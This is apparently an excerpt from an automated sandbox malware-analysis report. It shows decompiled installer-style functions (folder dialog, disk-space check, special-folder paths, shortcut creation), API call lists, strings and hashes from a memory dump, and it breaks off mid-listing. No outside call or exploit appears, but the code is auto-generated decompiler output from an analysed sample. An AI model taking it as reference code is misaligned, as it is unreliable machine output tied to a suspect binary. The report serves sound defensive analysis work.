                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                          • String ID: {
                                          • API String ID: 590372296-366298937
                                          • Opcode ID: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                          • Instruction ID: 6b58894f072d387ff385a1976498fa71d2bdad0bf2474ce794c2d1da48ffa65f
                                          • Opcode Fuzzy Hash: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                          • Instruction Fuzzy Hash: 48A14971900208BFEB219F61DD89AAE7F79FB08355F00407AFA05BA1A0C7755E41DFA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040411B, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 266stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E0040411B(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x4297a8;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x42f000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E004051D0(0x3fb, _t162);
					E00405B89(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004051D0(0x3fb, _t162);
							if(E004054FF(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E0040592B(0x428fa0, _t162);
							_t145 = 0;
							_t86 = E00405C49(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E0040592B(0x428fa0, _t162);
								_t88 = E004054B2(0x428fa0);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x428fa0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x428fa0) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x428fa0,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E00405465(0x428fa0) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x428fa0) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E0040456B(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42e33c; // 0x294de4
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E004044B6(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x428f90);
									} else {
										E004044B6(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x42ec04 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403CFF(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x429fc4 == _t145) {
									E004040B0();
								}
								 *0x429fc4 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x429fd8;
							_v56 = E00404450;
							_v52 = _t162;
							_v64 = E0040594D(0x3fb, 0x429fd8, _t162, 0x4293a8, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040541E(_t162);
								_t124 =  *0x42eb70; // 0x2903c0
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
									E0040594D(0x3fb, 0x429fd8, _t162, 0, _t125);
									if(lstrcmpiA(0x42db00, 0x429fd8) != 0) {
										lstrcatA(_t162, 0x42db00);
									}
								}
								 *0x429fc4 =  &(( *0x429fc4)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E0040548B(_t162) != 0 && E004054B2(_t162) == 0) {
						E0040541E(_t162);
					}
					 *0x42e338 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403CDD(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403CDD(_t159);
					E00403D12(_v12);
					_t138 = E00405C49(7);
					if(_t138 == 0) {
						L53:
						return E00403D44(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}








































                                          0x00404121
                                          0x00404128
                                          0x00404134
                                          0x00404142
                                          0x0040414a
                                          0x0040414e
                                          0x00404154
                                          0x00404154
                                          0x00404160
                                          0x004041d4
                                          0x004041db
                                          0x004042b0
                                          0x004042b7
                                          0x004042c6
                                          0x004042c6
                                          0x004042ca
                                          0x004042d0
                                          0x004042dd
                                          0x004042df
                                          0x004042df
                                          0x004042ed
                                          0x004042f2
                                          0x004042f5
                                          0x004042fc
                                          0x004042ff
                                          0x00404336
                                          0x00404338
                                          0x0040433e
                                          0x00404345
                                          0x00404347
                                          0x00404347
                                          0x00404363
                                          0x0040439f
                                          0x00000000
                                          0x00404365
                                          0x00404368
                                          0x0040437c
                                          0x0040437e
                                          0x00000000
                                          0x0040437e
                                          0x00404301
                                          0x00404305
                                          0x00404334
                                          0x00404334
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404307
                                          0x00404307
                                          0x00404314
                                          0x00404319
                                          0x00000000
                                          0x00000000
                                          0x0040431d
                                          0x0040431f
                                          0x0040431f
                                          0x0040432a
                                          0x0040432d
                                          0x00404332
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404332
                                          0x0040438d
                                          0x00404394
                                          0x0040439b
                                          0x004043a2
                                          0x004043a2
                                          0x004043a7
                                          0x004043a9
                                          0x004043b1
                                          0x004043b7
                                          0x004043b7
                                          0x004043be
                                          0x004043c7
                                          0x004043d1
                                          0x004043d9
                                          0x004043ef
                                          0x004043db
                                          0x004043df
                                          0x004043df
                                          0x004043d9
                                          0x004043f4
                                          0x004043f9
                                          0x004043fe
                                          0x00404407
                                          0x00404407
                                          0x00404410
                                          0x00404412
                                          0x00404412
                                          0x0040441e
                                          0x00404426
                                          0x00404430
                                          0x00404430
                                          0x00404435
                                          0x00000000
                                          0x00404435
                                          0x004042ff
                                          0x004042b9
                                          0x004042c0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004042c0
                                          0x004041e1
                                          0x004041e7
                                          0x00404201
                                          0x00404206
                                          0x00404210
                                          0x00404217
                                          0x00404226
                                          0x00404229
                                          0x0040422c
                                          0x00404233
                                          0x0040423b
                                          0x0040423e
                                          0x00404242
                                          0x00404249
                                          0x00404251
                                          0x004042a9
                                          0x00404253
                                          0x00404254
                                          0x0040425b
                                          0x00404260
                                          0x00404265
                                          0x0040426d
                                          0x0040427a
                                          0x0040428e
                                          0x00404292
                                          0x00404292
                                          0x0040428e
                                          0x00404297
                                          0x004042a2
                                          0x004042a2
                                          0x00404251
                                          0x00000000
                                          0x00404206
                                          0x004041f4
                                          0x00000000
                                          0x00000000
                                          0x004041fa
                                          0x00000000
                                          0x00404162
                                          0x00404162
                                          0x0040416e
                                          0x00404178
                                          0x00404185
                                          0x00404185
                                          0x0040418b
                                          0x00404194
                                          0x0040419d
                                          0x004041a0
                                          0x004041a3
                                          0x004041ab
                                          0x004041ae
                                          0x004041b1
                                          0x004041b9
                                          0x004041c0
                                          0x004041c7
                                          0x0040443b
                                          0x0040444d
                                          0x0040444d
                                          0x004041d2
                                          0x00000000
                                          0x004041d2

                                          APIs
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404167
                                          • SetWindowTextA.USER32(?,?), ref: 00404194
                                          • SHBrowseForFolderA.SHELL32(?,004293A8,?), ref: 00404249
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404254
                                          • lstrcmpiA.KERNEL32(hnahgvbse,00429FD8,00000000,?,?), ref: 00404286
                                          • lstrcatA.KERNEL32(?,hnahgvbse), ref: 00404292
                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004042A2
                                            • Part of subcall function 004051D0: GetDlgItemTextA.USER32 ref: 004051E3
                                            • Part of subcall function 00405B89: CharNextA.USER32(?), ref: 00405BE1
                                            • Part of subcall function 00405B89: CharNextA.USER32(?), ref: 00405BEE
                                            • Part of subcall function 00405B89: CharNextA.USER32(?), ref: 00405BF3
                                            • Part of subcall function 00405B89: CharPrevA.USER32(?,?), ref: 00405C03
                                          • GetDiskFreeSpaceA.KERNEL32(00428FA0,?,?,0000040F,?,00428FA0,00428FA0,?,00000000,00428FA0,?,?,000003FB,?), ref: 0040435B
                                          • MulDiv.KERNEL32 ref: 00404376
                                          • SetDlgItemTextA.USER32(00000000,00000400,00428F90), ref: 004043EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                          • String ID: A$C:\Users\user\AppData\Local\Temp$hnahgvbse$M)
                                          • API String ID: 2246997448-1584715942
                                          • Opcode ID: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                          • Instruction ID: a19ed3a57cd3ea7516059bd6de19f3cb3834a8abb31794935fb739ca8bc8323d
                                          • Opcode Fuzzy Hash: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                          • Instruction Fuzzy Hash: E09151B1A00218ABDB11DFA1DD85AEF7BB8EF84315F10407BFA04B62D1D77C99418B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040594D, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 195stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E0040594D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				intOrPtr _t72;
				signed int _t73;
				signed char _t74;
				intOrPtr _t77;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t77 =  *0x42e33c; // 0x294de4
					_t36 =  *(_t77 - 4 + _t36 * 4);
				}
				_t72 =  *0x42eb98; // 0x2939c0
				_t73 = _t72 + _t36;
				_t37 = 0x42db00;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x42db00;
				if(_a4 - 0x42db00 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E0040594D(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x42db00;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x42f000;
							E0040592B(_t84, (_t93 << 0xa) + 0x42f000);
						} else {
							E00405889(_t84,  *0x42eb68);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405B89(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42ebe4;
						if( *0x42ebe4 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x42eb64; // 0x74951528
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x42eb98;
							E00405812(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x42eb98, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E0040594D(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E0040592B(_a4, _t37);
			}































                                          0x0040594d
                                          0x0040594d
                                          0x0040594d
                                          0x00405953
                                          0x00405958
                                          0x0040595a
                                          0x00405969
                                          0x00405969
                                          0x0040596b
                                          0x00405974
                                          0x00405976
                                          0x0040597b
                                          0x0040597e
                                          0x0040597f
                                          0x00405986
                                          0x00405988
                                          0x0040598e
                                          0x00405991
                                          0x00405991
                                          0x00405b66
                                          0x00405b66
                                          0x00405b6a
                                          0x00000000
                                          0x00000000
                                          0x0040599e
                                          0x004059a4
                                          0x00000000
                                          0x00000000
                                          0x004059aa
                                          0x004059ab
                                          0x004059ae
                                          0x004059b1
                                          0x00405b59
                                          0x00405b63
                                          0x00405b65
                                          0x00405b65
                                          0x00405b5b
                                          0x00405b5d
                                          0x00405b5f
                                          0x00405b60
                                          0x00405b60
                                          0x00000000
                                          0x00405b59
                                          0x004059b7
                                          0x004059bb
                                          0x004059c0
                                          0x004059cf
                                          0x004059d2
                                          0x004059d4
                                          0x004059d9
                                          0x004059dc
                                          0x004059df
                                          0x004059e2
                                          0x004059e5
                                          0x004059e8
                                          0x00405b03
                                          0x00405b06
                                          0x00405b36
                                          0x00405b39
                                          0x00405b3e
                                          0x00405b42
                                          0x00405b42
                                          0x00405b47
                                          0x00405b48
                                          0x00405b4d
                                          0x00405b50
                                          0x00405b52
                                          0x00000000
                                          0x00405b52
                                          0x00405b08
                                          0x00405b0b
                                          0x00405b20
                                          0x00405b27
                                          0x00405b0d
                                          0x00405b14
                                          0x00405b14
                                          0x00405b2f
                                          0x00405b32
                                          0x00405afb
                                          0x00405afc
                                          0x00405afc
                                          0x00000000
                                          0x00405b32
                                          0x004059f0
                                          0x004059f1
                                          0x004059f7
                                          0x004059f9
                                          0x00405a13
                                          0x00405a13
                                          0x00405a1a
                                          0x00405a1a
                                          0x00405a21
                                          0x00405a25
                                          0x00405a25
                                          0x00405a26
                                          0x00405a28
                                          0x00405a61
                                          0x00405a64
                                          0x00405a74
                                          0x00405a77
                                          0x00405a7f
                                          0x00405a85
                                          0x00405a85
                                          0x00405ae1
                                          0x00405ae1
                                          0x00405ae3
                                          0x00000000
                                          0x00000000
                                          0x00405a89
                                          0x00405a90
                                          0x00405a91
                                          0x00405a93
                                          0x00405aad
                                          0x00405abb
                                          0x00405ac1
                                          0x00405ac3
                                          0x00405ade
                                          0x00405ade
                                          0x00405ade
                                          0x00000000
                                          0x00405ade
                                          0x00405ac9
                                          0x00405ad4
                                          0x00405ada
                                          0x00405adc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405adc
                                          0x00405a95
                                          0x00405a98
                                          0x00000000
                                          0x00000000
                                          0x00405aa7
                                          0x00405aa9
                                          0x00405aab
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405aab
                                          0x00000000
                                          0x00405ae1
                                          0x00405a6c
                                          0x00000000
                                          0x00405a2a
                                          0x00405a2f
                                          0x00405a45
                                          0x00405a4a
                                          0x00405a4d
                                          0x00405aea
                                          0x00405aea
                                          0x00405aee
                                          0x00405af6
                                          0x00405af6
                                          0x00000000
                                          0x00405aee
                                          0x00405a57
                                          0x00405ae5
                                          0x00405ae5
                                          0x00405ae8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405ae8
                                          0x00405a28
                                          0x004059fb
                                          0x004059ff
                                          0x00000000
                                          0x00000000
                                          0x00405a01
                                          0x00405a05
                                          0x00000000
                                          0x00000000
                                          0x00405a07
                                          0x00405a0b
                                          0x00000000
                                          0x00405a0d
                                          0x00405a0d
                                          0x00000000
                                          0x00405a0d
                                          0x00405a0b
                                          0x00405b70
                                          0x00405b7a
                                          0x00405b86
                                          0x00405b86
                                          0x00000000

                                          APIs
                                          • GetVersion.KERNEL32(00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 004059F1
                                          • GetSystemDirectoryA.KERNEL32(hnahgvbse,00000400), ref: 00405A6C
                                          • GetWindowsDirectoryA.KERNEL32(hnahgvbse,00000400), ref: 00405A7F
                                          • SHGetSpecialFolderLocation.SHELL32(?,0041FA6B), ref: 00405ABB
                                          • SHGetPathFromIDListA.SHELL32(0041FA6B,hnahgvbse), ref: 00405AC9
                                          • CoTaskMemFree.OLE32(0041FA6B), ref: 00405AD4
                                          • lstrcatA.KERNEL32(hnahgvbse,\Microsoft\Internet Explorer\Quick Launch), ref: 00405AF6
                                          • lstrlenA.KERNEL32(hnahgvbse,00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 00405B48
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$hnahgvbse$M)
                                          • API String ID: 900638850-2847218805
                                          • Opcode ID: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                          • Instruction ID: df3d1b2a2a9ff386ea366cfb08fccb3f72b75f9b6d2186fcd2ce51f7d99f39fa
                                          • Opcode Fuzzy Hash: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                          • Instruction Fuzzy Hash: 83510071A00A05AADF20AB65DC84BBF3BB4EB55724F14423BE911B62D0D33C6942DF5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001000, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52memoryregistryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 10001008
                                          • HeapAlloc.KERNEL32(00000000), ref: 1000100F
                                          • RegCreateKeyExW.ADVAPI32(80000002,10000000,00000000,00000000,00000000,0002001F,00000000,-00000007,00000000), ref: 10001058
                                          • GetProcessHeap.KERNEL32(00000000,00000001), ref: 10001068
                                          • HeapFree.KERNEL32(00000000), ref: 1000106F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Heap$Process$AllocCreateFree
                                          • String ID: returning %p
                                          • API String ID: 3034372947-1981732286
                                          • Opcode ID: bef14ff329170a341c7337b66d028bd12022a910616ff29065d26573c307885f
                                          • Instruction ID: f5aada24cf31a5d2b5df8315e8a027717e97e26d3c403dfb97c55b0d34e31b78
                                          • Opcode Fuzzy Hash: bef14ff329170a341c7337b66d028bd12022a910616ff29065d26573c307885f
                                          • Instruction Fuzzy Hash: 0D118078640248FFF710CF94CD49FA977B9EB49741F208048FA04AB391C6B5EE809B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E0040548B(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\Albus\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409370, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409370, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                          0x0040201b
                                          0x00402025
                                          0x0040202e
                                          0x00402038
                                          0x00402041
                                          0x0040204b
                                          0x0040204f
                                          0x0040204f
                                          0x00402054
                                          0x00402065
                                          0x0040206d
                                          0x0040214d
                                          0x0040214d
                                          0x00402154
                                          0x00402073
                                          0x00402073
